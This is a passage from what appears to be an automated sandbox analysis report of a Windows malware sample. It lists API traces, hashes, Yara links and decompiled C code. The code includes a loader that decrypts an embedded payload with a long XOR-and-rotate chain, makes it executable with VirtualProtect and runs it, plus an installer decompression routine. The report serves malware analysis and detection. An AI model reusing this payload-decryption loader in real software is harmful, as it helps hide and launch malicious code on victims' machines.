                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $C:\Users\user~1\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-3295812854
                • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF854DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF855B4
                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF855DE
                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16), ref: 6FF855F5
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85617
                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000,00000000), ref: 6FF8568A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85695
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000), ref: 6FF856E0
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                • String ID:
                • API String ID: 656311269-0
                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction ID: 15a9098e55853074b10621f1050f0ea71fbece52cbfd70e14ec3269583920160
                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction Fuzzy Hash: 9161A671F00719ABDB10CFB8C884BAEBBB5AF48720F144159E926EB390DB749D41CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF83070, Relevance: 6.2, APIs: 4, Instructions: 176memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E6FF83070() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t117;

				_v16 = _v16 & 0x00000000;
				_t117 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t117;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x1547) {
						_t14 =  &E6FF850D8 + _v12; // 0x0
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ 0x00000071;
						_v5 = (_v5 & 0x000000ff) - 8;
						_v5 = _v5 & 0x000000ff ^ 0x00000083;
						_v5 = (_v5 & 0x000000ff) + 0x3b;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - 0xcd;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x72;
						_v5 = _v5 & 0x000000ff ^ 0x00000091;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x51;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xa9;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000078;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000034;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x81;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x47;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xd2;
						 *((char*)( &E6FF850D8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E6FF850D8, 0x1547, 0x40,  &_v20); // executed
					E6FF850D8(); // executed
				}
				return 0;
			}








                0x6ff83076
                0x6ff83088
                0x6ff8308e
                0x6ff83095
                0x6ff830a8
                0x6ff830b0
                0x6ff830b4
                0x6ff830c1
                0x6ff830d1
                0x6ff830d7
                0x6ff830e1
                0x6ff830eb
                0x6ff830f7
                0x6ff83101
                0x6ff83113
                0x6ff8311f
                0x6ff83128
                0x6ff83132
                0x6ff8313e
                0x6ff83148
                0x6ff83152
                0x6ff83165
                0x6ff8316f
                0x6ff83178
                0x6ff83182
                0x6ff8318c
                0x6ff83196
                0x6ff831a0
                0x6ff831ac
                0x6ff831be
                0x6ff831c8
                0x6ff831d2
                0x6ff831db
                0x6ff831e5
                0x6ff831ef
                0x6ff83202
                0x6ff8320c
                0x6ff83215
                0x6ff8321f
                0x6ff83228
                0x6ff8323a
                0x6ff83244
                0x6ff8324d
                0x6ff83256
                0x6ff83262
                0x6ff8326b
                0x6ff83275
                0x6ff8327e
                0x6ff83287
                0x6ff83293
                0x6ff8329c
                0x6ff830be
                0x6ff830be
                0x6ff832b7
                0x6ff832c2
                0x6ff832c2
                0x6ff832c9

                APIs
                • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 6FF83081
                • RtlAllocateHeap.NTDLL(00000000), ref: 6FF83088
                • memset.MSVCRT ref: 6FF830A8
                • VirtualProtect.KERNELBASE(6FF850D8,00001547,00000040,?), ref: 6FF832B7
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Heap$AllocateProcessProtectVirtualmemset
                • String ID:
                • API String ID: 173993298-0
                • Opcode ID: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction ID: 75691ab74c273baf09d7a8214c8cd99d08812dc9f1491c5083dbdc8407a31050
                • Opcode Fuzzy Hash: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction Fuzzy Hash: 21815521C5D2D9ADDB02CBF944157FCBFB05E26112F0845C6E4E5B6283C13A838E9B21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
